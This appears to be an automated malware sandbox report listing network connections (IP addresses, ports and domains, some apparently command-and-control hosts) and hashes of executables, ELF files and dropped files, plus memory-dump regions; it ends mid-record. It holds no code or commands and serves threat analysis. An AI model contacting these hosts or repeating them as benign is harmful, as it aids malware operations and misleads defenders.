US 154.64.84.212:80 www.xyhbg.com tcp
HU 109.61.80.71:80 109.61.80.71 tcp
BD 103.202.55.172:65012 tcp
US 172.93.187.72:80 tcp
BG 193.42.32.237:2404 tcp
BG 193.42.32.237:2404 tcp
NL 88.221.24.122:443 www.bing.com udp
US 172.93.187.72:80 tcp
BG 193.42.32.237:2404 tcp
US 172.93.187.72:80 tcp
BG 193.42.32.237:2404 tcp
US 172.93.187.72:80 tcp
US 8.8.8.8:53 www.ailearningprompts.com udp
US 198.54.117.216:80 www.ailearningprompts.com tcp
US 8.8.8.8:53 216.117.54.198.in-addr.arpa udp
BG 193.42.32.237:2404 tcp
US 198.54.117.216:80 www.ailearningprompts.com tcp
US 198.54.117.216:80 www.ailearningprompts.com tcp
BG 193.42.32.237:2404 tcp
BG 193.42.32.237:2404 tcp
BD 103.202.55.172:65012 tcp
US 172.93.187.72:80 tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
BG 193.42.32.237:2404 tcp
US 172.93.187.72:80 tcp
BG 193.42.32.237:2404 tcp
US 172.93.187.72:80 tcp
US 8.8.8.8:53 www.firstenergyconp.com udp
US 76.223.26.96:80 www.firstenergyconp.com tcp
US 172.93.187.72:80 tcp
US 8.8.8.8:53 96.26.223.76.in-addr.arpa udp
US 76.223.26.96:80 www.firstenergyconp.com tcp
HU 109.61.80.71:80 109.61.80.71 tcp
US 76.223.26.96:80 www.firstenergyconp.com tcp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 52.182.143.212:443 nw-umwatson.events.data.microsoft.com tcp
US 8.8.8.8:53 212.143.182.52.in-addr.arpa udp
US 172.93.187.72:80 tcp
US 172.93.187.72:80 tcp
BD 103.202.55.172:65012 tcp
US 172.93.187.72:80 tcp
US 172.93.187.72:80 tcp
US 172.93.187.72:80 tcp
US 172.93.187.72:80 tcp
US 8.8.8.8:53 www.ywx5pn.com udp
NL 88.221.24.18:443 www.bing.com udp
US 172.93.187.72:80 tcp
BD 103.202.55.172:65012 tcp
US 172.93.187.72:80 tcp
RU 5.42.64.33:80 5.42.64.33 tcp
US 172.93.187.72:80 tcp
HU 109.61.80.71:80 109.61.80.71 tcp
US 172.93.187.72:80 tcp
US 162.254.38.168:80 www.surpcop.online tcp
US 162.254.38.168:80 www.surpcop.online tcp
US 162.254.38.168:80 www.surpcop.online tcp
US 172.93.187.72:80 tcp
US 172.93.187.72:80 tcp
BD 103.202.55.172:65012 tcp
US 172.93.187.72:80 tcp
US 172.93.187.72:80 tcp
US 8.8.8.8:53 www.hiit4lifenorthbridge.com udp
US 104.21.43.73:80 www.hiit4lifenorthbridge.com tcp
US 8.8.8.8:53 73.43.21.104.in-addr.arpa udp
US 104.21.43.73:80 www.hiit4lifenorthbridge.com tcp
US 104.21.43.73:80 www.hiit4lifenorthbridge.com tcp
US 172.93.187.72:80 tcp
US 172.93.187.72:80 tcp
US 172.93.187.72:80 tcp
BD 103.202.55.172:65012 tcp
HU 109.61.80.71:80 109.61.80.71 tcp
US 8.8.8.8:53 aefd.nelreports.net udp
US 2.18.121.79:443 aefd.nelreports.net tcp
US 8.8.8.8:53 th.bing.com udp
US 8.8.8.8:53 r.bing.com udp
NL 88.221.24.41:443 r.bing.com udp
NL 88.221.24.41:443 r.bing.com udp
NL 88.221.24.18:443 r.bing.com udp
US 172.93.187.72:80 tcp
US 8.8.8.8:53 79.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 41.24.221.88.in-addr.arpa udp
HK 43.154.67.170:80 www.miszedbc.click tcp
US 8.8.8.8:53 170.67.154.43.in-addr.arpa udp
HK 43.154.67.170:80 www.miszedbc.click tcp
HK 43.154.67.170:80 www.miszedbc.click tcp
US 172.93.187.72:80 tcp
US 172.93.187.72:80 tcp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 104.208.16.94:443 nw-umwatson.events.data.microsoft.com tcp
US 8.8.8.8:53 94.16.208.104.in-addr.arpa udp
US 172.93.187.72:80 tcp
US 172.93.187.72:80 tcp
US 8.8.8.8:53 www.liaozx.link udp
BD 103.202.55.172:65012 tcp
US 172.93.187.72:80 tcp
US 172.93.187.72:80 tcp
US 172.93.187.72:80 tcp
US 172.93.187.72:80 tcp
VN 103.75.184.21:80 www.nongsanvietco.com tcp
HU 109.61.80.71:80 109.61.80.71 tcp
VN 103.75.184.21:80 www.nongsanvietco.com tcp
VN 103.75.184.21:80 www.nongsanvietco.com tcp
US 172.93.187.72:80 tcp
BD 103.202.55.172:65012 tcp
US 172.93.187.72:80 tcp
US 172.93.187.72:80 tcp
US 172.93.187.72:80 tcp
US 74.220.199.6:80 www.dsc-marketing.com tcp
US 74.220.199.6:80 www.dsc-marketing.com tcp
US 74.220.199.6:80 www.dsc-marketing.com tcp
US 172.93.187.72:80 tcp
US 172.93.187.72:80 tcp
BD 103.202.55.172:65012 tcp
US 172.93.187.72:80 tcp
US 172.93.187.72:80 tcp
US 34.149.87.45:80 www.willispeng.com tcp
US 34.149.87.45:80 www.willispeng.com tcp
US 34.149.87.45:80 www.willispeng.com tcp
US 172.93.187.72:80 tcp
HU 109.61.80.71:80 109.61.80.71 tcp
US 172.93.187.72:80 tcp
US 172.93.187.72:80 tcp
BD 103.202.55.172:65012 tcp
US 172.93.187.72:80 tcp
US 8.8.8.8:53 www.ywx5pn.com udp
US 172.93.187.72:80 tcp
US 172.93.187.72:80 tcp
FR 51.254.49.49:9191 tcp
US 172.93.187.72:80 tcp
US 172.93.187.72:80 tcp
US 8.8.8.8:53 www.sky71.link udp
BD 103.202.55.172:65012 tcp
US 172.93.187.72:80 tcp
RU 5.42.64.33:80 5.42.64.33 tcp
US 172.93.187.72:80 tcp
HU 109.61.80.71:80 109.61.80.71 tcp
US 172.93.187.72:80 tcp
US 8.8.8.8:53 app.nnnaajjjgc.com udp
US 3.130.253.23:80 www.landscapestandard.com tcp
US 172.93.187.72:80 tcp
HK 154.221.26.108:80 app.nnnaajjjgc.com tcp
US 3.130.253.23:80 www.landscapestandard.com tcp
US 3.130.253.23:80 www.landscapestandard.com tcp
US 172.93.187.72:80 tcp
BD 103.202.55.172:65012 tcp
US 172.93.187.72:80 tcp
US 172.93.187.72:80 tcp
US 8.8.8.8:53 www.arcade-games-88932.bond udp
US 172.93.187.72:80 tcp
US 172.93.187.72:80 tcp
US 172.93.187.72:80 tcp
HU 109.61.80.71:80 109.61.80.71 tcp
BD 103.202.55.172:65012 tcp
US 172.93.187.72:80 tcp
US 172.93.187.72:80 tcp
US 34.149.87.45:80 www.willispeng.com tcp
US 34.149.87.45:80 www.willispeng.com tcp
US 34.149.87.45:80 www.willispeng.com tcp
US 172.93.187.72:80 tcp
US 172.93.187.72:80 tcp
US 172.93.187.72:80 tcp
US 172.93.187.72:80 tcp
BD 103.202.55.172:65012 tcp
US 8.8.8.8:53 www.087687303.xyz udp
US 172.93.187.72:80 tcp
US 172.93.187.72:80 tcp
US 172.93.187.72:80 tcp
HU 109.61.80.71:80 109.61.80.71 tcp
US 172.93.187.72:80 tcp
US 8.8.8.8:53 www.willispeng.com udp
US 34.149.87.45:80 www.willispeng.com tcp
US 172.93.187.72:80 tcp
BD 103.202.55.172:65012 tcp

Files

C:\Users\Admin\Desktop\2023-09-04\45b7beddf9f3ea15182a974874712315821195f76441a08e83c5fc5d34cd5a9c.elf

MD5 34d4abb848465af726f576032ccba577
SHA1 1ad359775019c7450aa0c90d8bcd668d725d7c5a
SHA256 45b7beddf9f3ea15182a974874712315821195f76441a08e83c5fc5d34cd5a9c
SHA512 3402d69536e70211939689a60d2b7f56a490ba20f692870ff27dd052f4357b2881b776b23f366f977ede9240f554ad8d8d6ba0ba4710085aa4802a437c1741ec

C:\Users\Admin\Desktop\2023-09-04\e6dc1e715c4d89cb05ee731303d439c8d879bf3534ed7cd449d20e10d676282c.elf

MD5 a917b10bf3a03b1951a0864d11e10d6c
SHA1 9ebea984d445ea6edbd1eeaac706afcebc27f9b4
SHA256 e6dc1e715c4d89cb05ee731303d439c8d879bf3534ed7cd449d20e10d676282c
SHA512 2698451c405e0fe210619d3481477c2229bc452c8b301cb0d35d04c7c47d31ce13a26b47e6f8fa4be7adf095f2dff2640acfd30973f2af0ad03a4de33ab2ddb5

C:\Users\Admin\Desktop\2023-09-04\2810fec0fa1ce5497bacc6ab6f7b13a1396f641fe2466985ae55f742bbb3515c.exe

MD5 d3f61ecc190b1b4835255d8b32e97265
SHA1 0c4632ccf395570f01b8fb54e16cb243e85eb26e
SHA256 2810fec0fa1ce5497bacc6ab6f7b13a1396f641fe2466985ae55f742bbb3515c
SHA512 5e749c42cad525d7d0d5173ef14a92762afad81938909ae37da0f5071e3c3a019545312e9274ec2533eb0136719efc61886faceaed9db74ccefdebd9458950b4

C:\Users\Admin\Desktop\2023-09-04\a6eba2f8d860ee620cdae9e23f98a2e760f3b6423ce64b4338f4ae9828951adc.elf

MD5 7337be9d43d5998d412d5395ddd6f250
SHA1 6d7f604935bef5eb2534d6151aea6a40d80848d6
SHA256 a6eba2f8d860ee620cdae9e23f98a2e760f3b6423ce64b4338f4ae9828951adc
SHA512 d534cb4b1840fe6a21576ae753c09c71a47df4be44e6e32c88929816ed946ded6e97d3b0545fca6fe81650c25bbac5c14a5103382fc974b063745dceac9e6390

C:\Users\Admin\Desktop\2023-09-04\0af4b2f2226ca4fa843cec93b45e5b13a717839df876ca60b563e11ba2acb608.pdf

MD5 b5ef4d4a77de604fdd91592a38dd924e
SHA1 d16ced736deaa468143b16cce5f69b92b23fbade
SHA256 0af4b2f2226ca4fa843cec93b45e5b13a717839df876ca60b563e11ba2acb608
SHA512 ea8477c53de9f443f2926b0f67b274a9829bb11c86c2b9e5d7935f1b5644761def3e95ca97a77292962830581f5687ecddd9385f0d7483cd8e3a4d80804d2865

C:\Users\Admin\Desktop\2023-09-04\0e0e5c2cfdabbea0c06dc0469d2025057d381cbc531d3c7799a88336c33d4132.exe

MD5 03e63797af8eb961b09a840d1a41e361
SHA1 75b5cb53d1eb4806dda53cafbe588206b953beb8
SHA256 0e0e5c2cfdabbea0c06dc0469d2025057d381cbc531d3c7799a88336c33d4132
SHA512 66a2bedceadb12840db452d5f5f075bce584a76280ffd322701885b824c0105913ef6aa37cfb4beab2e7c2d4c37b7c04275df3aca99f390d318a08fbed653cc9

C:\Users\Admin\Desktop\2023-09-04\0e0e5c2cfdabbea0c06dc0469d2025057d381cbc531d3c7799a88336c33d4132.exe

MD5 03e63797af8eb961b09a840d1a41e361
SHA1 75b5cb53d1eb4806dda53cafbe588206b953beb8
SHA256 0e0e5c2cfdabbea0c06dc0469d2025057d381cbc531d3c7799a88336c33d4132
SHA512 66a2bedceadb12840db452d5f5f075bce584a76280ffd322701885b824c0105913ef6aa37cfb4beab2e7c2d4c37b7c04275df3aca99f390d318a08fbed653cc9

memory/4404-982-0x0000000075580000-0x0000000075B31000-memory.dmp

memory/4404-983-0x0000000075580000-0x0000000075B31000-memory.dmp

memory/4404-984-0x00000000018D0000-0x00000000018E0000-memory.dmp

C:\Users\Admin\Desktop\2023-09-04\0e8ce281e417e03f6a428d872d9b0b7997f5063b259f520b51234c16c87dd0e3.exe

MD5 499058b8a95bade765f8ca87b90e80a2
SHA1 e03d567d0684d83d34fc52e2aedb57397672963f
SHA256 0e8ce281e417e03f6a428d872d9b0b7997f5063b259f520b51234c16c87dd0e3
SHA512 ba796be1e48f42a786aa59a98469e4e8b1e5694de8a62f64f285b34573e7ad94e5ff6decb13858d79e09073e8ccf5997d90206375e4665479286092b128698fb

C:\Users\Admin\Desktop\2023-09-04\0e8ce281e417e03f6a428d872d9b0b7997f5063b259f520b51234c16c87dd0e3.exe

MD5 499058b8a95bade765f8ca87b90e80a2
SHA1 e03d567d0684d83d34fc52e2aedb57397672963f
SHA256 0e8ce281e417e03f6a428d872d9b0b7997f5063b259f520b51234c16c87dd0e3
SHA512 ba796be1e48f42a786aa59a98469e4e8b1e5694de8a62f64f285b34573e7ad94e5ff6decb13858d79e09073e8ccf5997d90206375e4665479286092b128698fb

memory/4192-988-0x00000000014F0000-0x00000000015F0000-memory.dmp

memory/4192-989-0x0000000002FD0000-0x0000000003020000-memory.dmp

memory/4192-990-0x0000000000400000-0x00000000013C3000-memory.dmp

memory/4192-991-0x00000000731A0000-0x0000000073950000-memory.dmp

memory/4192-992-0x0000000003440000-0x0000000003450000-memory.dmp

memory/4404-994-0x0000000075580000-0x0000000075B31000-memory.dmp

memory/4192-995-0x0000000003440000-0x0000000003450000-memory.dmp

memory/4192-993-0x0000000005CE0000-0x0000000006284000-memory.dmp

memory/4192-996-0x0000000008710000-0x00000000087A2000-memory.dmp

memory/4192-997-0x0000000003440000-0x0000000003450000-memory.dmp

memory/4192-998-0x0000000008830000-0x000000000883A000-memory.dmp

memory/4192-999-0x0000000008940000-0x0000000008F58000-memory.dmp

memory/4192-1000-0x0000000009000000-0x0000000009012000-memory.dmp

memory/4192-1001-0x0000000009020000-0x000000000912A000-memory.dmp

memory/4192-1002-0x0000000009130000-0x000000000916C000-memory.dmp

C:\Users\Admin\Desktop\2023-09-04\2b04a8ff2faa3346370bc021df7c81c78a688c00a4e67a1f64580e5a14501bee.exe

MD5 927192a146717504be18e2114235dd28
SHA1 99800de6ce00b93ac0aa01035ab7d2eb9aa27f58
SHA256 2b04a8ff2faa3346370bc021df7c81c78a688c00a4e67a1f64580e5a14501bee
SHA512 ed45049c15838cf571930e71c3cb5c2745f44241666bf0113cbef228ed61e89db20817a2c36ffb669e1d8efa9557244b33a668192dff5b6b39399026cd29a432

C:\Users\Admin\Desktop\2023-09-04\2b04a8ff2faa3346370bc021df7c81c78a688c00a4e67a1f64580e5a14501bee.exe

MD5 927192a146717504be18e2114235dd28
SHA1 99800de6ce00b93ac0aa01035ab7d2eb9aa27f58
SHA256 2b04a8ff2faa3346370bc021df7c81c78a688c00a4e67a1f64580e5a14501bee
SHA512 ed45049c15838cf571930e71c3cb5c2745f44241666bf0113cbef228ed61e89db20817a2c36ffb669e1d8efa9557244b33a668192dff5b6b39399026cd29a432

memory/4404-1005-0x00000000018D0000-0x00000000018E0000-memory.dmp

memory/2656-1006-0x0000000000F50000-0x0000000001078000-memory.dmp

memory/2656-1007-0x00000000731A0000-0x0000000073950000-memory.dmp

memory/2656-1008-0x00000000058E0000-0x000000000599E000-memory.dmp

memory/2656-1009-0x00000000058E0000-0x000000000599E000-memory.dmp

memory/2656-1011-0x00000000058E0000-0x000000000599E000-memory.dmp

memory/2656-1013-0x00000000058E0000-0x000000000599E000-memory.dmp

memory/2656-1015-0x00000000058E0000-0x000000000599E000-memory.dmp

memory/2656-1017-0x00000000058E0000-0x000000000599E000-memory.dmp

memory/2656-1020-0x00000000058E0000-0x000000000599E000-memory.dmp

memory/2656-1022-0x00000000058E0000-0x000000000599E000-memory.dmp

memory/2656-1024-0x00000000058E0000-0x000000000599E000-memory.dmp

memory/4192-1025-0x0000000009350000-0x00000000093B6000-memory.dmp

memory/2656-1027-0x00000000058E0000-0x000000000599E000-memory.dmp

memory/2656-1029-0x00000000058E0000-0x000000000599E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe

MD5 03e63797af8eb961b09a840d1a41e361
SHA1 75b5cb53d1eb4806dda53cafbe588206b953beb8
SHA256 0e0e5c2cfdabbea0c06dc0469d2025057d381cbc531d3c7799a88336c33d4132
SHA512 66a2bedceadb12840db452d5f5f075bce584a76280ffd322701885b824c0105913ef6aa37cfb4beab2e7c2d4c37b7c04275df3aca99f390d318a08fbed653cc9

memory/2656-1032-0x00000000058E0000-0x000000000599E000-memory.dmp

memory/2656-1037-0x00000000058E0000-0x000000000599E000-memory.dmp

memory/2656-1039-0x00000000058E0000-0x000000000599E000-memory.dmp

memory/4192-1040-0x0000000009B20000-0x0000000009B96000-memory.dmp

memory/2656-1048-0x00000000058E0000-0x000000000599E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe

MD5 03e63797af8eb961b09a840d1a41e361
SHA1 75b5cb53d1eb4806dda53cafbe588206b953beb8
SHA256 0e0e5c2cfdabbea0c06dc0469d2025057d381cbc531d3c7799a88336c33d4132
SHA512 66a2bedceadb12840db452d5f5f075bce584a76280ffd322701885b824c0105913ef6aa37cfb4beab2e7c2d4c37b7c04275df3aca99f390d318a08fbed653cc9

memory/4192-1049-0x00000000014F0000-0x00000000015F0000-memory.dmp

memory/4404-1051-0x0000000075580000-0x0000000075B31000-memory.dmp

memory/2656-1053-0x00000000058E0000-0x000000000599E000-memory.dmp

memory/4192-1052-0x0000000009C00000-0x0000000009C1E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe

MD5 03e63797af8eb961b09a840d1a41e361
SHA1 75b5cb53d1eb4806dda53cafbe588206b953beb8
SHA256 0e0e5c2cfdabbea0c06dc0469d2025057d381cbc531d3c7799a88336c33d4132
SHA512 66a2bedceadb12840db452d5f5f075bce584a76280ffd322701885b824c0105913ef6aa37cfb4beab2e7c2d4c37b7c04275df3aca99f390d318a08fbed653cc9

memory/2656-1043-0x00000000058E0000-0x000000000599E000-memory.dmp

memory/4192-1055-0x0000000000400000-0x00000000013C3000-memory.dmp

memory/2656-1056-0x00000000058E0000-0x000000000599E000-memory.dmp

memory/4576-1057-0x0000000075580000-0x0000000075B31000-memory.dmp

memory/4576-1060-0x0000000001990000-0x00000000019A0000-memory.dmp

memory/2656-1059-0x00000000058E0000-0x000000000599E000-memory.dmp

memory/2656-1062-0x00000000058E0000-0x000000000599E000-memory.dmp

memory/4192-1063-0x00000000731A0000-0x0000000073950000-memory.dmp

memory/2656-1065-0x00000000058E0000-0x000000000599E000-memory.dmp

memory/2656-1069-0x00000000058E0000-0x000000000599E000-memory.dmp

memory/2656-1067-0x00000000058E0000-0x000000000599E000-memory.dmp

memory/2656-1071-0x00000000058E0000-0x000000000599E000-memory.dmp

memory/2656-1073-0x00000000058E0000-0x000000000599E000-memory.dmp

memory/2656-1075-0x00000000058E0000-0x000000000599E000-memory.dmp

memory/4192-1076-0x0000000003440000-0x0000000003450000-memory.dmp

memory/2656-1078-0x00000000058E0000-0x000000000599E000-memory.dmp

memory/2656-1080-0x00000000058E0000-0x000000000599E000-memory.dmp

memory/2656-1082-0x00000000058E0000-0x000000000599E000-memory.dmp

memory/2656-1084-0x00000000058E0000-0x000000000599E000-memory.dmp

memory/2656-1086-0x00000000058E0000-0x000000000599E000-memory.dmp

memory/2656-1088-0x00000000058E0000-0x000000000599E000-memory.dmp

memory/2656-1090-0x00000000058E0000-0x000000000599E000-memory.dmp

memory/4192-1102-0x0000000009DD0000-0x0000000009F92000-memory.dmp

memory/4192-1110-0x0000000009FA0000-0x000000000A4CC000-memory.dmp

memory/4192-1117-0x0000000003440000-0x0000000003450000-memory.dmp

memory/4192-1225-0x0000000003440000-0x0000000003450000-memory.dmp

C:\Users\Admin\Desktop\2023-09-04\5e184f6a7be1ee66c1bb770b66cf475c09d7ab4baaf36f9e0203041fc7098717.exe

MD5 8e5651e25e0e81274e3e86b0dae11103
SHA1 124930a68aad827e7f28c228efbb233d3a3082b2
SHA256 5e184f6a7be1ee66c1bb770b66cf475c09d7ab4baaf36f9e0203041fc7098717
SHA512 b77c4f8564dcaba455ad44debb133ec83f5ff0f4ce69b18d965593012aed4d07048746ccea0d25fb795dcb662f8be05b50061f659aefd63bb18a1c4c4fa9005b

C:\Users\Admin\Desktop\2023-09-04\5e184f6a7be1ee66c1bb770b66cf475c09d7ab4baaf36f9e0203041fc7098717.exe

MD5 8e5651e25e0e81274e3e86b0dae11103
SHA1 124930a68aad827e7f28c228efbb233d3a3082b2
SHA256 5e184f6a7be1ee66c1bb770b66cf475c09d7ab4baaf36f9e0203041fc7098717
SHA512 b77c4f8564dcaba455ad44debb133ec83f5ff0f4ce69b18d965593012aed4d07048746ccea0d25fb795dcb662f8be05b50061f659aefd63bb18a1c4c4fa9005b

memory/2656-1563-0x00000000731A0000-0x0000000073950000-memory.dmp

memory/1400-1565-0x00007FF764FC0000-0x00007FF76507B000-memory.dmp

memory/4576-1798-0x0000000075580000-0x0000000075B31000-memory.dmp

memory/4576-1800-0x0000000001990000-0x00000000019A0000-memory.dmp

C:\Users\Admin\Desktop\2023-09-04\06a27adaf5718c110f2b6a709f428a83650fba961460795518a6cfebaea02d0e.exe

MD5 ffa8dfd4bfeda52e6608e451c2e8c27b
SHA1 b53a62f62a484bbbf1de1220e8e2d9feab05936b
SHA256 06a27adaf5718c110f2b6a709f428a83650fba961460795518a6cfebaea02d0e
SHA512 afce52b40ecd6addda262527542ca6f3ab9d8f661955b1a631a94438d9990f31e9d08f724e2d10bf21b60692c700ee1e8e8bc8726e6a6acfba5ab9d77b093ccf

C:\Users\Admin\Desktop\2023-09-04\06a27adaf5718c110f2b6a709f428a83650fba961460795518a6cfebaea02d0e.exe

MD5 ffa8dfd4bfeda52e6608e451c2e8c27b
SHA1 b53a62f62a484bbbf1de1220e8e2d9feab05936b
SHA256 06a27adaf5718c110f2b6a709f428a83650fba961460795518a6cfebaea02d0e
SHA512 afce52b40ecd6addda262527542ca6f3ab9d8f661955b1a631a94438d9990f31e9d08f724e2d10bf21b60692c700ee1e8e8bc8726e6a6acfba5ab9d77b093ccf

memory/1400-1882-0x0000000004970000-0x0000000004AE1000-memory.dmp

memory/1400-1884-0x0000000004AF0000-0x0000000004C21000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nsy6853.tmp\System.dll

MD5 a4dd044bcd94e9b3370ccf095b31f896
SHA1 17c78201323ab2095bc53184aa8267c9187d5173
SHA256 2e226715419a5882e2e14278940ee8ef0aa648a3ef7af5b3dc252674111962bc
SHA512 87335a43b9ca13e1300c7c23e702e87c669e2bcf4f6065f0c684fc53165e9c1f091cc4d79a3eca3910f0518d3b647120ac0be1a68eaade2e75eaa64adfc92c5a

memory/4652-1915-0x00000000036D0000-0x0000000005B2A000-memory.dmp

memory/1400-2121-0x0000000004AF0000-0x0000000004C21000-memory.dmp

memory/2656-2122-0x0000000005AB0000-0x0000000005AC0000-memory.dmp

memory/2656-2123-0x00000000033E0000-0x00000000033E1000-memory.dmp

memory/4652-2124-0x00000000036D0000-0x0000000005B2A000-memory.dmp

C:\Users\Admin\Desktop\2023-09-04\6f89a16231002ca16d388f2fee2ad80acca8c9e7e12d5f778881ac352c35dd8a.exe

MD5 45d39a81a21aaf22643be15be1a0e2f7
SHA1 333193ef81873d594ee3ca7ab64d90cf7919cae6
SHA256 6f89a16231002ca16d388f2fee2ad80acca8c9e7e12d5f778881ac352c35dd8a
SHA512 6b8c71afa3988dd4b2633faa66c0afbf43f24a29471db43a865c8ad23edf16cc30d35ab38cb93ef712784afa2f45152500cd66ffa882236897b07f217d0e4321

C:\Users\Admin\Desktop\2023-09-04\6f89a16231002ca16d388f2fee2ad80acca8c9e7e12d5f778881ac352c35dd8a.exe

MD5 45d39a81a21aaf22643be15be1a0e2f7
SHA1 333193ef81873d594ee3ca7ab64d90cf7919cae6
SHA256 6f89a16231002ca16d388f2fee2ad80acca8c9e7e12d5f778881ac352c35dd8a
SHA512 6b8c71afa3988dd4b2633faa66c0afbf43f24a29471db43a865c8ad23edf16cc30d35ab38cb93ef712784afa2f45152500cd66ffa882236897b07f217d0e4321

memory/4576-2128-0x0000000001990000-0x00000000019A0000-memory.dmp

memory/4576-2129-0x0000000001990000-0x00000000019A0000-memory.dmp

memory/2656-2130-0x0000000005AB0000-0x0000000005AC0000-memory.dmp

C:\Users\Admin\Desktop\2023-09-04\7c24993316855b8e855a8ea660369bf117784e27a9cf850e3936ff1e19250d8f.exe

MD5 2dd5a5d8f67167aeb3e834a5f49f68a4
SHA1 feed4c713fb539c2e528d0a66b910b7e155821e8
SHA256 7c24993316855b8e855a8ea660369bf117784e27a9cf850e3936ff1e19250d8f
SHA512 59d917e6b8150db859d3cc4da23ce42cb64d7c7f2d3998d08d9bf76a156105e2f13f3c4eafdf53e0b9c16fd49ba96f77bb28ed6309dc964e7bbddffe189a2dff

C:\Users\Admin\Desktop\2023-09-04\7c24993316855b8e855a8ea660369bf117784e27a9cf850e3936ff1e19250d8f.exe

MD5 2dd5a5d8f67167aeb3e834a5f49f68a4
SHA1 feed4c713fb539c2e528d0a66b910b7e155821e8
SHA256 7c24993316855b8e855a8ea660369bf117784e27a9cf850e3936ff1e19250d8f
SHA512 59d917e6b8150db859d3cc4da23ce42cb64d7c7f2d3998d08d9bf76a156105e2f13f3c4eafdf53e0b9c16fd49ba96f77bb28ed6309dc964e7bbddffe189a2dff

memory/4576-2135-0x0000000001990000-0x00000000019A0000-memory.dmp

memory/3876-2136-0x00000000731A0000-0x0000000073950000-memory.dmp

memory/3876-2137-0x0000000000730000-0x0000000000764000-memory.dmp

memory/4576-2138-0x0000000001990000-0x00000000019A0000-memory.dmp

C:\Users\Admin\Desktop\2023-09-04\9a9c8c815e41e4173ef0ca4ae518d232bc3dbc5e6e62d565cf52620ab6d0a6fc.exe

MD5 6f2fd71e78a332394d6ab77747d9d81d
SHA1 949c6de97bc614d27a70f5d6f9dead9c2427b96c
SHA256 9a9c8c815e41e4173ef0ca4ae518d232bc3dbc5e6e62d565cf52620ab6d0a6fc
SHA512 e5d8190f586657fb81700205869e1abe0f40726ac2f5bce4cbc06ef6c5c1a0bbaf34e1b2471a4d780dbf62f165f178f121bace319b2c1065b284b406d86a3ee9

C:\Users\Admin\Desktop\2023-09-04\9a9c8c815e41e4173ef0ca4ae518d232bc3dbc5e6e62d565cf52620ab6d0a6fc.exe

MD5 6f2fd71e78a332394d6ab77747d9d81d
SHA1 949c6de97bc614d27a70f5d6f9dead9c2427b96c
SHA256 9a9c8c815e41e4173ef0ca4ae518d232bc3dbc5e6e62d565cf52620ab6d0a6fc
SHA512 e5d8190f586657fb81700205869e1abe0f40726ac2f5bce4cbc06ef6c5c1a0bbaf34e1b2471a4d780dbf62f165f178f121bace319b2c1065b284b406d86a3ee9

memory/4672-2141-0x00000000731A0000-0x0000000073950000-memory.dmp

memory/4672-2142-0x0000000000510000-0x000000000060A000-memory.dmp

memory/4672-2143-0x0000000004ED0000-0x0000000004EE0000-memory.dmp

C:\Users\Admin\Desktop\2023-09-04\14eb5c233e173d7d387b37bcec81fa6f3a6a2485e6f6a174f0e72100872aeb66.exe

MD5 74c9d3fc91b0d8ac5620a3efc82cae69
SHA1 6ceea062fa22d785b4d5c64768acd5738aac130b
SHA256 14eb5c233e173d7d387b37bcec81fa6f3a6a2485e6f6a174f0e72100872aeb66
SHA512 9beb3728776fec9f6da6da3aaea48e06a4ffd39ace4e6078973e5d5496add4142da5f651aec816eeddb6b5b866b1f301c410287fe89e448a0a9d02c350d228d5

C:\Users\Admin\Desktop\2023-09-04\14eb5c233e173d7d387b37bcec81fa6f3a6a2485e6f6a174f0e72100872aeb66.exe

MD5 74c9d3fc91b0d8ac5620a3efc82cae69
SHA1 6ceea062fa22d785b4d5c64768acd5738aac130b
SHA256 14eb5c233e173d7d387b37bcec81fa6f3a6a2485e6f6a174f0e72100872aeb66
SHA512 9beb3728776fec9f6da6da3aaea48e06a4ffd39ace4e6078973e5d5496add4142da5f651aec816eeddb6b5b866b1f301c410287fe89e448a0a9d02c350d228d5

memory/928-2146-0x0000022E807F0000-0x0000022E808C2000-memory.dmp

memory/928-2147-0x00007FFD439A0000-0x00007FFD44461000-memory.dmp

memory/928-2148-0x0000022E9AED0000-0x0000022E9AEE0000-memory.dmp

memory/928-2149-0x0000022E80C90000-0x0000022E80CAA000-memory.dmp

memory/3876-2151-0x00000000731A0000-0x0000000073950000-memory.dmp

C:\Users\Admin\Desktop\2023-09-04\38d0c2cf38e1dcaca20a6d79903a6075d171d2b31c980c4a789965a783b23b49.exe

MD5 132f74bd9b76fb23e6fda5d94ed5e830
SHA1 50915a5adc087282094bd772826100d3734b94c7
SHA256 38d0c2cf38e1dcaca20a6d79903a6075d171d2b31c980c4a789965a783b23b49
SHA512 a1179ea09fc8ef7f6655e7e02c4eab3f2b1b15bda4303715d32fe0a7c90381745c276903db9eca9458bdc4fc20806eca1d77bb6bb5e03d0d834d6ed912b9ea2b

C:\Users\Admin\Desktop\2023-09-04\38d0c2cf38e1dcaca20a6d79903a6075d171d2b31c980c4a789965a783b23b49.exe

MD5 132f74bd9b76fb23e6fda5d94ed5e830
SHA1 50915a5adc087282094bd772826100d3734b94c7
SHA256 38d0c2cf38e1dcaca20a6d79903a6075d171d2b31c980c4a789965a783b23b49
SHA512 a1179ea09fc8ef7f6655e7e02c4eab3f2b1b15bda4303715d32fe0a7c90381745c276903db9eca9458bdc4fc20806eca1d77bb6bb5e03d0d834d6ed912b9ea2b

memory/3876-2156-0x0000000005190000-0x00000000051A0000-memory.dmp

C:\Users\Admin\Desktop\2023-09-04\49dedf19d0d69cc9c0247803d3748ccf25b2c17504f6e07c48a84d8515ec1575.exe

MD5 bbf978f70ce0b754cd8231c67c165451
SHA1 d9cf4f958a3033734b6e06e40d4285f0ff57da82
SHA256 49dedf19d0d69cc9c0247803d3748ccf25b2c17504f6e07c48a84d8515ec1575
SHA512 8bbd717e2425a5d25c87464b04ea010e4c08fa57c672e5e7023785e5027948033accc1496a47c67a0dda3ad910b062151cefd1b03cccb89f3abf76dbd5700ac0

C:\Users\Admin\Desktop\2023-09-04\49dedf19d0d69cc9c0247803d3748ccf25b2c17504f6e07c48a84d8515ec1575.exe

MD5 bbf978f70ce0b754cd8231c67c165451
SHA1 d9cf4f958a3033734b6e06e40d4285f0ff57da82
SHA256 49dedf19d0d69cc9c0247803d3748ccf25b2c17504f6e07c48a84d8515ec1575
